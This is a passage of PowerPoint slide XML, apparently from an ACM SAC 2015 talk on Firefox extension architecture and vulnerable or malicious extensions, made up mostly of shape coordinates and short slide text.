                  <a:pt x="38100" y="1803654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="2099462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127000" y="2437176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152400" y="2484772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165100" y="2531835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190500" y="2578240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="2623865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="2668584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254000" y="2712275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279400" y="2754814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="2796077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330200" y="2835940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368300" y="2874279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="393700" y="2910971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431800" y="2945892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444500" y="2963418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457200" y="2980182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495300" y="3013861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546100" y="3044370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584200" y="3071299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635000" y="3094239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="673100" y="3112780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="723900" y="3126512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774700" y="3135027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825500" y="3137916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850900" y="3137154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876300" y="3135630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="889000" y="3133344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914400" y="3129534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965200" y="3116795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016000" y="3098489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1066800" y="3075245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104900" y="3047695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155700" y="3016467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1193800" y="2982194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1231900" y="2945504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1270000" y="2907030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="2865882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333500" y="2821686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358900" y="2780900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1384300" y="2738967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409700" y="2695964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1435100" y="2651967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1460500" y="2607051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473200" y="2561292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498600" y="2514768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1524000" y="2419724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549400" y="2371356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612900" y="2124110"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1638300" h="3138170">
                <a:moveTo>
                  <a:pt x="1612900" y="1236784"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1612900" y="1015362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1536700" y="725080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511300" y="677642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498600" y="630725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473200" y="584424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1460500" y="538835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1435100" y="494051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1409700" y="450167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1384300" y="407278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358900" y="365479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333500" y="324865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1308100" y="285529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282700" y="247567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244600" y="211074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1231900" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206500" y="174498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1181100" y="141835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143000" y="111410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092199" y="83694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1054099" y="59159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015999" y="38279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965199" y="21525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914399" y="9370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876299" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825499" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800099" y="762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736599" y="10631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685799" y="24236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="634999" y="42679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584199" y="65541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546099" y="92402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507999" y="122843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457199" y="156444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431799" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406399" y="211836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="393699" y="231648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355599" y="269046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330199" y="308091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304799" y="348667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279399" y="390656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253999" y="433941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228599" y="478406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203199" y="523934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177799" y="570408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165099" y="617712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139699" y="665729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101599" y="812887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76199" y="862586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63499" y="912415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63499" y="1112637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88899" y="1013584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88899" y="963761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114299" y="864076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139699" y="814437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177799" y="667669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203199" y="619833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215899" y="572726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241299" y="526459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266699" y="481144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292099" y="436891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317499" y="393812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342899" y="352018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368299" y="311620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406399" y="272729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431799" y="235458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457199" y="217932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469899" y="200406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507999" y="167767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546099" y="137740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584199" y="110755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622299" y="87244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="673099" y="67639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711199" y="52371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761999" y="41873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="812799" y="36576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850899" y="36576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="863599" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888999" y="40386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939799" y="50446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977899" y="65641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1028699" y="85463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1066800" y="109404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1117600" y="136957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155700" y="167616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1181100" y="200872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1219200" y="236220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1231900" y="254508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1270000" y="294894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="334623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333500" y="375664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358900" y="417927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1384300" y="461324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1397000" y="505763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1422400" y="551157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="597415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1460500" y="644449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485900" y="692169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1524000" y="838548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549400" y="888117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549400" y="937925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="1137758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="1187420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612900" y="1236784"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1638300" h="3138170">
                <a:moveTo>
                  <a:pt x="1638300" y="1974172"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1638300" y="1159877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612900" y="1063801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612900" y="1334262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1625600" y="1411986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1625600" y="2024141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1638300" y="1974172"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1638300" h="3138170">
                <a:moveTo>
                  <a:pt x="1625600" y="2024141"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1625600" y="1726692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612900" y="1804416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1612900" y="2074111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1625600" y="2024141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20268" y="3559302"/>
            <a:ext cx="4897373" cy="310210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512306" y="5719064"/>
            <a:ext cx="1929764" cy="2743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600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>without Adblock</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Plus</a:t>
            </a:r>
            <a:endParaRPr sz="16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250439" y="6862829"/>
            <a:ext cx="1640839" cy="2743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600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with Adblock</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Plus</a:t>
            </a:r>
            <a:endParaRPr sz="16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72516" y="6787386"/>
            <a:ext cx="10521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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM SAC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:endParaRPr sz="12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937752" y="6791196"/>
            <a:ext cx="2794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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>103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456179" y="929131"/>
            <a:ext cx="5080000" cy="5791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600" dirty="0"/>
              <a:t>Architecture </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-20" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>extensions</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8131302" y="816101"/>
            <a:ext cx="1197863" cy="16017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832864" y="1806194"/>
            <a:ext cx="6010275" cy="4127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500" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>extension is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>downloaded as an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.xpi</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="25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469897" y="2518410"/>
            <a:ext cx="2731770" cy="39471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413758" y="3140455"/>
            <a:ext cx="4602480" cy="68897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600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contains </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all information </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>about the content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>window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45"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Descriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr sz="16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213097" y="3228594"/>
            <a:ext cx="163067" cy="762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213097" y="3604259"/>
            <a:ext cx="163067" cy="762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213097" y="4485894"/>
            <a:ext cx="163067" cy="7619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213097" y="4877561"/>
            <a:ext cx="163067" cy="762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213097" y="5335523"/>
            <a:ext cx="163067" cy="762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213097" y="5759958"/>
            <a:ext cx="163067" cy="762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213097" y="6118859"/>
            <a:ext cx="163067" cy="762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572516" y="6787386"/>
            <a:ext cx="10521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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM SAC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:endParaRPr sz="12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413758" y="4495299"/>
            <a:ext cx="4952365" cy="25044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600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contains </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>special </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(home made) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XPCOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="10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600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>components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45"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contains the core of the extension such as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.XUL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="1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600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and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1600" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="2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1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>files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1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contains plugins </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the extension need</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>some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350"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contains the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>defaults </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>preferences and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="36830">
              <a:lnSpc>
                <a:spcPct val="102200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1305"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Modifies the appearance of the extension (image and  css</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>files)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="153670" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="445"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>104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551686" y="852931"/>
            <a:ext cx="6823709" cy="5791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600" spc="-10" dirty="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="10" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="5" dirty="0"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>extensions</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058672" y="1559228"/>
            <a:ext cx="7824470" cy="4579620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="90170" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306705" indent="-294005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="43750"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="307340" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Some extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-250" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" lvl="1" indent="-293370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="509"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1089660" marR="5080" lvl="2" indent="-260350">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
